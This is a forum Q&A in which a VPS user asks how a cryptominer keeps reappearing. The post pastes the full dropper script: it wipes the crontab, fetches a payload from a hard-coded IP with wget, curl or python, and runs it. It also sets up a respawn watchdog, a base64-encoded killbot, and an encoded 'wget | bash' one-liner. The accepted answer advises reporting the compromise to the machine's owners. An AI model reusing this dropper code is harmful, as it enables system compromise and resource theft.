On a VPS that I use, somehow I got a little annoying miner. (I'm not root)
15109 ? Z 0:00 [sh] <defunct>
15134 ? Ssl 0:03 []
15160 ? S 0:00 ./5DiaEd75 ./bNlMGMON
15162 ? S 0:00 ./5DiaEd75 ./bnkI202h
15183 ? S 0:00 sleep 5
15184 ? S 0:00 sleep 5
Every time it starts with a different name from /var/tmp.
As far as I have seen, it downloads a file from transfer.sh (later edit: the script is the one from transfer.sh, I thought it was the site) sometime after I kill it (this I saw from stalking ps x)
47067 ? S 0:00 sh -c echo -n 'd2dldCAtcSAtTyAtIGh0dHA6Ly8yMDQuNDguMjQuNzIvaW5kZXguaHRtbCB8IGJhc2g=' | base64 -d | bash
47070 ? S 0:00 bash
47072 ? S 0:00 bash
47088 ? S 0:00 wget http://204.48.24.72/zeenuts -O ./0amdpE5K
I checked the crontab, but there is nothing there and if I put something there it gets deleted after that process starts.
I also see before this thing starts a:
27985 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t -f root
I can't get rid of this thing.
Is there a way that it sets a cron-like job without using crontab? or using the sendmail function?
The [] process using lsof it says it runs from /; also in /var/tmp, it downloads 2 executables.
The /user/bin/sendmail might not be related, as I noticed that starts whenever I set in crontab a command and it gets executed. Might be a setitng the admin made for crontab jobs.
2.6.32-642.el6.x86_64
CentOS release 6.8 (Final)
I saw the script:
#<!--
function random() {
chars=abcdefghijklmnop1234567890ABCDEFGHIJKLMNOP
for i in {1..8} ; do
echo -n ${chars:RANDOM%${#chars}:1}
done
}
new_bash=$(random)
new_daemon=$(random)
new_killbot=$(random)
new_payload=$(random)
crontab -r
writable_path=("/var/tmp" "/tmp" `pwd`)
for install_path in ${writable_path[@]}
do
cd $install_path
rm -rf touch ponezz
cp `command -v touch` ./touch
./touch ./ponezz
if [ ! -f ./ponezz ]; then
continue
else
rm -rf touch ponezz
break
fi
done
if [ $(command -v wget | wc -l) -eq 1 ]; then
wget http://204.48.24.72/zeenuts -O ./$new_payload
elif [ $(command -v curl | wc -l) -eq 1 ]; then
curl http://204.48.24.72/zeenuts -o ./$new_payload
elif [ $(command -v python | wc -l) -eq 1 ]; then
if [ $(python -V 2>&1 | sed 's/.* \([0-9]\).\([0-9]\).*/\1\2/') -lt "30" ]; then
python -c "from urllib import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
else
python -c "from urllib.request import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
fi
fi
chmod 777 ./$new_payload
nohup ./$new_payload
./$new_payload
echo "sleep 2;rm "'$0'" ;while true;do sleep 5; ps x | grep -F '[]' | grep -v grep;if [ "'$?'" -eq 1 ]; then chmod 777 ./$new_payload;nohup ./$new_payload;./$new_payload;fi;ps | grep -F '[]' | grep -v grep | awk '{print "'$1'"}' | awk '{if(NR>1)print}' | xargs -n1 kill -9;done" | tee ./$new_daemon
echo -n 'c2xlZXAgMjtybSAkMCA7d2hpbGUgdHJ1ZTtkbyBzbGVlcCA1OyBwcyBhdXggfGdyZXAgLXYgLUYgJ1tdJyB8IGF3ayAne2lmKCQzPjQwLjApIHByaW50ICQyfScgfCB3aGlsZSByZWFkIHByb2NpZDsgZG8ga2lsbCAtOSAkcHJvY2lkOyBkb25lO2RvbmU=' | base64 -d | tee ./$new_killbot
cp `command -v bash` ./$new_bash
./$new_bash ./$new_daemon &
./$new_bash ./$new_killbot &
Fun little script, but I can't figure out how it keeps on starting.
Best Answer
Since you are not the owner of, or admin on, the compromised machine, you should report this to the people that do own or administrate the machine. They have an ongoing security breach and they need to take immediate action.
It may be a "harmless" bitcoin miner, or it may well be that the bitcoin miner (if that is what it is) is the only process that you're able to spot. It does not matter, the machine is compromised and it should be taken off the Internet immediately.
Please also see
I've reported to DigitalOcean (to which the IP address in the base64-encoded string belongs) that this is happening, with a pointer to this U&L question.